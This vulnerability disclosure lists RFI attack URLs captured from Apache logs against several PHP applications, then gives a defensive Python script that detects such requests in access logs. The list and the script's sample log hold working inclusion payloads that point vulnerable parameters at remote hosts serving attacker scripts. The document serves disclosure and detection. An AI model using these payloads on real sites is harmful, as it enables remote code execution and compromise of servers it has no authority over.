Disclosure: Multiple Software Remote File Inclusion

[This was originally disclosed on the VIM mail list. VulnDB IDs 90794, 90795, 90796. This was the result of watching Apache logs on attrition.org and observing a wide variety of RFI attacks. I started comparing some of the scripts being attempted with OSVDB and noticed some were not found. That means these were essentially 0days being exploited in the wild.]

Quick searches didn’t find these in OSVDB. I haven’t had time to check the other VDBs.

/contenido/external/frontend/news.php?cfg[path][includes]=http://www.jef.at/vn

/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/res.txt??

/claroline/tracking/userLog.php?rootSys=http://www.free-ddl.com/siteadmin/test.txt%3f%3f%3f

/admin/cron_pop.php?adm_path=http://www.smagz.com/bo.do%3f%3f

/class/class.dashboard_lms.php?where_framework=http://www.randdesign.de/ppoint/include/main.txt??

/modules/TotalCalendar/validcode.php?inc_dir=http://www.geocities.com/injitinjitsemut/cmd1.txt??

/classified_right.php?language_dir=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??

/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.unescoulsan.org/bbs//data/safe1.txt???
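The entries above were pulled by hand out of Apache access logs. The following Python script is an added example (not part of the original post, and not a tool the author used) that automates that triage step: it parses Apache combined-format log lines, flags every query parameter whose value is an absolute http/ftp URL (the signature of a remote file inclusion attempt), and reduces the hits to distinct (script path, parameter name) pairs, which is the unit you would look up in OSVDB or another vulnerability database. The log lines are constructed for the example and use reserved documentation addresses and an `.invalid` hostname in place of the real remote hosts; the script paths and parameter names mirror three of the entries above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: client ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that starts with a remote scheme is the RFI signature: a PHP script that
# passes it to include()/require() will fetch and execute it when remote inclusion is enabled.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftps?)://', re.IGNORECASE)

# Constructed sample log (not from attrition.org). Hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2008:03:14:07 +0000] "GET /claroline/tracking/userLog.php?rootSys=http://rfi-host.invalid/test.txt%3f%3f%3f HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
203.0.113.5 - - [10/Jan/2008:03:14:08 +0000] "GET /contenido/external/frontend/news.php?cfg[path][includes]=http://rfi-host.invalid/vn HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Jan/2008:03:15:01 +0000] "GET /index.php?page=about&lang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2008:03:15:02 +0000] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rfi-host.invalid/safe1.txt??? HTTP/1.1" 404 199 "-" "Mozilla/5.0"
"""


def parse_log_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi_params(target):
    """Return (script_path, param_name, remote_url) for each query parameter whose
    decoded value is a remote URL. parse_qsl percent-decodes both names and values,
    so env%5Binclude_prefix%5D becomes env[include_prefix] and %3f becomes ?."""
    parts = urlsplit(target)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_SCHEME_RE.match(value):
            # The trailing "??" / "%3f%3f" seen in these probes pushes whatever the vulnerable
            # script appends to the path into the remote URL's query string; strip it for reporting.
            hits.append((parts.path, name, value.rstrip('?')))
    return hits


def scan(lines):
    """Return one finding dict per suspected RFI attempt found in an iterable of log lines."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        for script, param, remote in find_rfi_params(rec['target']):
            findings.append({
                'client': rec['client'],
                'script': script,
                'param': param,
                'remote': remote,
                'status': rec['status'],
            })
    return findings


def unique_vectors(findings):
    """Distinct (script, param) pairs: the thing to compare against a vulnerability database."""
    return sorted({(f['script'], f['param']) for f in findings})


if __name__ == '__main__':
    found = scan(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f['client']} -> {f['script']} [{f['param']}] <- {f['remote']} (HTTP {f['status']})")
    print('vectors to check against OSVDB:')
    for script, param in unique_vectors(found):
        print(f'  {script}?{param}=')
```

Two points on reading the output: a 404 status only means the script is not installed on this server, not that the probe is harmless elsewhere, so the (script, param) pair is still worth recording; and the URL-in-parameter heuristic will also match legitimate redirect or callback parameters, so treat the list as a triage queue rather than a verdict.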
